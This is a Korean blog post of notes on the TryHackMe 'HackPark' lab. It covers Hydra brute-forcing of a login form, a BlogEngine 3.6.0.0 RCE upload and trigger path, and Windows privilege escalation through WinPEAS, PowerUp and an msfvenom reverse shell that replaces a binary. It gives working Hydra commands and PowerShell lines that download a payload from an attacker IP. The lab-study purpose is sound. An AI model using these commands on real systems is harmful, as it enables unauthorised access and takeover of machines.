HackPark
Bruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine!
1. 익스플로잇-DB 설명 잘 해석하여 StepByStep 따라하기
2. 윈도우에 파워쉘이 설치되어 있으면 wget처럼 다운로드가 쉽다.
3. 권한상승을 위해 winPEAS 또는 파워업 쉘을 활용하자.
4. 페이로드 주입시 미터프리터, 커맨드 쉘 둘다 시도해 보자.
5. 히드라 브루트포스시 필수 파라미터 다 입력해줘야 한다. 더블쿼트 사용시 버그발생함, 싱글쿼트만 사용하자.
Flow 정리
1. 정보수집
홈페이지 -> admin 브루트포스(히드라) -> CMS 정보 확인
2. Exploit
Exploit-DB(searchsploit) 검색 -> 업로드, RCE
3. 권한상승
Enumeration(WinPEAS,PowerUp.ps1) -> 비정상 프로세스 확인 (주기적 재시작, writable 속성, administrator 권한으로 실행) -> msfvenom 리버스쉘 생성(미터프리터x, 커맨드쉘) -> 파일 바꿔치기
히드라
-U: 모듈에 대한 예제보기
hydra http-post-from -U
다른 사용 예제 붙여놓음
아이디 브루트 포싱(S:성공, F:실패시 메세지, 생략시 실패시 메세지)
hydra -L 파일명 -P 파일명 아이피 -V http-form-post 'wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Login+In&testcookie=1:S=Location'
* 존재하는 계정에 대한 응답이 다를 경우, S값을 정의하여 정의된 아이디를 알아낼 수 있다.
비번 브루트 포싱
hydra -L 파일명 -P 파일명 아이피 -V http-form-post 'wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Login+In&testcookie=1:F=Location'
윈도우즈 흔한 word writable 임시 디렉토리 위치
C:\Windows\Temp
메타스플로잇 페이로드
환경에 따라 다르지만 쉘 페이로드를 삽입할때, 미터프리터 쉘, 커맨드 쉘 둘다 해보는게 좋다.
미터는 안되는데 simple은 연결되는 경우가 존재함.
WinPeas is a great tool which will enumerate the system and attempt to recommend potential vulnerabilities that we can exploit. The part we are most interested in for this room is the running processes!
WinPEAS의 bat과 exe 파일타입
exe는 컬러로 나와서 보기 편함, OS별 난독화 지원, 단점으로 일부 기능에서 에러가 발생
bat는 범용적으로 실행 가능하며 exe와 다른 많은 정보를 보여줌
각기 다른 정보를 Enumeration하므로 둘다 사용하는게 좋다.
파워 쉘 파일 다운로드
powershell (New-Object System.Net.WebClient).Downloadfile('http://[your_ip]:[listening_port]/[shell_name.exe]','[filename]')
powershell Invoke-WebRequest -Uri http://10.8.0.212/shell.exe -Outfile shell.exe
파워업스크립트 실행방법 (우선 방화벽 우회가 필요함)
To load up PowerUp, first download the raw script to a local location, and then launch Powershell:
C:> powershell.exe -nop -exec bypass
Then import the PowerUp module with the
following:
cmd>powershell
PS C:\> Import-Module PowerUp.ps1
PS C:\> . .\PowerUp.ps1
PS C:\> Invoke-AllChecks
블로그엔진 3.6.0.0 RCE 정리
취약코드는 아래를 통해 볼수있음
/Custom/Controls/PostList.ascx.cs
이 RCE 파일은 호스트와 포트를 수정하고 아래 파일명으로 업로드 되야한다.
PostView.ascx
업로드 후 경로: /App_Data/files
업로드가 존재하는 위치: /admin/app/editor/editpost.cshtml
파일 트리거 경로: /?theme=../../App_data/files
'OSCP > TryHackMe' 카테고리의 다른 글
| [Linux] Skynet (0) | 2020.04.23 |
|---|---|
| [Linux] Game Zone (0) | 2020.04.22 |
| [Windows] Alfred (0) | 2020.04.16 |
| [Windows] Steel Mountain (0) | 2020.04.14 |
| [Linux] Kenobi (0) | 2020.04.14 |